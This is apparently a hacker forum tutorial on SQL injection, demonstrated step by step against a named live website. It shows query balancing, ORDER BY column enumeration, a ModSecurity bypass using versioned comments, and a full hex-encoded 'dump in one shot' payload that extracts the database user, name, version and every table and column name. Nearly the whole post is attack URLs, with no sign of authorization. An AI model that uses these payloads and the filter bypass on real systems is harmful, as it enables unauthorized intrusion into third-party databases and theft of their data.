Newest Post
Hello
Today i'm going to show you sqli (variable) method.***
ok let's start :
1. 1st we will try to balance query
site: http://www.unmpress.com/shell.php?Page=catalog
so we will put ( \ ) back slash in catalog
site give us a error
pic: http://prntscr.com/8nzhm2
ok now trying to fix this error
http://www.unmpress.com/shell.php?Page=catalog') -- -
Done 
query successfully fixed
pic: http://prntscr.com/8nzidy
ok now trying to inject this site
1st we will find total Column
http://www.unmpress.com/shell.php?Page=catalog') order by 1 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 2 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 3 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 4 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 5 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 6 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 7 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 8 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 9 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 10 -- - [ no error ]
http://www.unmpress.com/shell.php?Page=catalog') order by 11 -- - [ error ]
pic: http://prntscr.com/8nziwo
so it's mean Total column is 10
ok now we will fin vulnerable column
http://www.unmpress.com/shell.php?Page=catalog') and 0 union select 1,2,3,4,5,6,7,8,9,10 -- -
Not Acceptable!
Not Acceptable!
An appropriate representation of the requested resource could not be
found on this server. This error was generated by Mod_Security.
Pic: http://prntscr.com/8nzk9t
don't worry we will try to bypass it ******
done ****** Successfully bypassed
site: http://www.unmpress.com/shell.php?Page=catalog') and 0 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7,8,9,10 -- -
pic: http://prntscr.com/8nzlb7
we found total 3 column vulnerable
column 9,3,4
pic: http://prntscr.com/8nzlr6
now try to do dios in any table ******
i use dios in number 3 vulnerable column
http://www.unmpress.com/shell.php?Page=catalog')
and 0 /*!50000union*/ /*!50000select*/
1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8,9,10
-- -but it's not working ******
ok now we will try something different.*** now we will try to use Variable Method
as a example : and@x:=concat() union select 1,@x,3 -- -
and@x:= (@x it's variable)
you can use any word @c @b @m anything ***
and variable method writing example : (and) then your variable method like @x then (
semi colon then (=) a equal then your text or diosand@x:=concat(database()) union select 1,@x,3 -- -
so if vulnerable column is 2 thenn it's show you database name coz you store database function in your variable ****** so you can print version,database,user etc.***
ok now we will try it in our vulnerable site
http://www.unmpress.com/shell.php?Page
=catalog%27%29%20%20+and@x:=concat+%280x3c62723e,0x3c62723e,0x696e6a65637465642062792072303074786630726333,0x3c62723e,0x557365723a3a3a3a,USER%28%29,0x3c62723e,0x44423a3a3a3a,DATABASE%28%29,0x3c62723e,0x56657273696f6e3a3a3a3a,VERSION%28%29,0x3c62723e,0x3c62723e,@:=0,%28select+count%28*%29/*!50000from*/information_schema.columns+where+table_schema=database%28%29+and@:=concat+%28@,0x3c6c693e,table_name,0x3a3a,column_name%29%29,@%29/*!50000UNION*/SELECT++1,2,3,@x,5,6,7,8,9,10%20--%20-Done ****** we are success
pic: http://prntscr.com/8nznr3
and sorry for my Bad English :'(
Source http://forum.sqliwiki.com/showthread.php?tid=2
